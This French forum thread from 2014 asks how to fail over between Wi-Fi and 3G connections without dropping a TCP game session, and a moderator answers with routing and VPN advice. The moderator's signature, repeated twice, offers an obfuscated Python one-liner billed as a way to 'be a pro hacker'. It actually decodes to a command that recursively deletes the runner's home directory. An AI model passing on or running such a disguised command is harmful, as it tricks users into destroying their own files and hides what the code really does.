Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-11-2014 18:06:11

addon
Nouveau membre

Plusieurs connexions simultanées

Bonjour,

Je viens poser ma question ici car cela fait plusieurs jours que je cherche une solution et je n'y arrive pas.

J'ai la possibilité de me connecter à un réseau wifi (pc portable) et un réseau 3G (smartphone). Mon pc a donc 2 connections actives avec un accès à internet.
Par défaut, Windows donne la priorité à une des deux connexions. Si celle-ci coupe, il passe sur la deuxième.

Le problème, c'est que dans mon cas, si je joue à un mmo et que la connexion prioritaire coupe, je suis déconnecté.

J'ai déjà téléchargé Connectify Dispatch (logiciel de load balancing) qui n'a rien arrangé. J'ai envoyé un message au support et voici la réponse :

Hello,

Thank you for contacting Connectify. Dispatch does not move existing sockets from one connection to the other, but assigns NEW sockets to an Internet connection. So, if one of your Internet connections goes down, Dispatch will assign any new sockets to the other connection. However, the applications with sockets on the old connection will need to realize the connection is broken and attempt a new socket, which will get them moved to the other connection. So there will be a momentary lapse in Internet connectivity. Some applications are good at realizing this, while other applications need to be manually poked to get them to give up the old socket.

If you want a seamless failover between connections without programs having to reconnect, you should check out our product Speedify instead.

Impossible pour moi de tester Speedify (j'ai l'impression que c'est une sorte de VPS), il n'y a pas de version d'essai et les prix sont exorbitants.

Apparemment, il est possible de combiner plusieurs connexions grâce à la métrique que l'on peut changer dans Windows. Je n'ai pas encore testé tous les aspects de cette solution mais d'après ce que j'ai vu, mettre la métrique de toutes les connexions à la même valeur ne change rien au problème

Alors voilà la question :
Est-il possible de combiner plusieurs connxions à internet de façon à ce que si la principale coupe, une autre prenne le relai sans que les applications soient déconnectées ?

Merci d'avance à ceux qui prendront le temps de se pencher sur la question smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-11-2014 23:27:56

spawn
Modérateur

Re : Plusieurs connexions simultanées

« applications soient déconnectées »
Il va falloir finasser.

Connexions à internet :

Ton ordinateur est relié à des réseaux via des interfaces. Virtuelles ou physiques, elles ont chacune une addresse IP (quand tout fonctionne).

microsoft windows : wmic nicconfig list
debian : ip a s
Déconnexion des applications

Une application peut contacter un serveur de bien des manières.
En UDP, il n'y a pas de « connexion » (c'est plutôt stateless comme truc), c'est à dire que chaque paquet est envoyé avec une destination et on espère qu'il arrivera un jour. C'est le noyau de ton système d'exploitation qui se charge de trouver une route pour ce paquet, depuis une des IP des interfaces qu'il a (ethernet et wlan par exemple) vers l'ip de destination (loin)

Ce que tu appelle «connexion à internet» n'est qu'une route possible dans la table de routage de son système d'exploitation. C'est lui qui choisit par où passer. (En général par la passerelle par défaut wink )

Par conséquent, si une de tes connexions saute et qu'il ne te reste qu'une interface (le wi-fi meurt, mais pas le câble par exemple), le noyau se démerdera pour balancer tous les paquets via la seule route possible restante.

Pas mal de jeux profitent de beaucoup des avantages d'UDP. Les VPN aussi.

En TCP, ce n'est pas pareil. Il y a une connexion. À chaque paquet, les deux parties se répètent «OK, c'est bon, je l'ai eu le dernier paquet». J'ignore si on peut changer d'interface en live.
Je sais que quand on bind un port pour écouter des clients, on doit spécifier une interface, ou toutes les interfaces (et c'est le noyau qui se débrouille) et qu'on ne change pas ça trivialement.

Mes connaissances s'arrêtent ici.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 11-11-2014 21:42:35

addon
Nouveau membre

Salut spawn, merci pour ta réponse smile

En effet, après avoir fait une capture wireshark, il se trouve que le jeu n'utilise que du TCP.

J'ai remarqué quelque chose d'intéressant. Si le wifi passe en "accès limité", mon ping sur le jeu se met à monter (normal, je ne suis plus connecté à internet). Mais si je me déconnecte et que je me reconnecte à un autre point d'accès (avec accès internet), le ping revient à la normale et je ne suis donc pas déconnecté du jeu.

Donc apparemment il faut rester sur la même interface pour que la trame tcp reprenne, ça m'embête bien.

Je ne vois pas comment faire du coup hmm

Dernière modification par addon (11-11-2014 21:43:25)

#4 12-11-2014 20:12:40

spawn
Modérateur

Sinon, tu peux te connecter via un vpn, qui s'assurera de faire transiter ta connection tcp dans un tunnel udp de manière transparente. Bon, ça nécessite un serveur vpn après big_smile

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.022 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]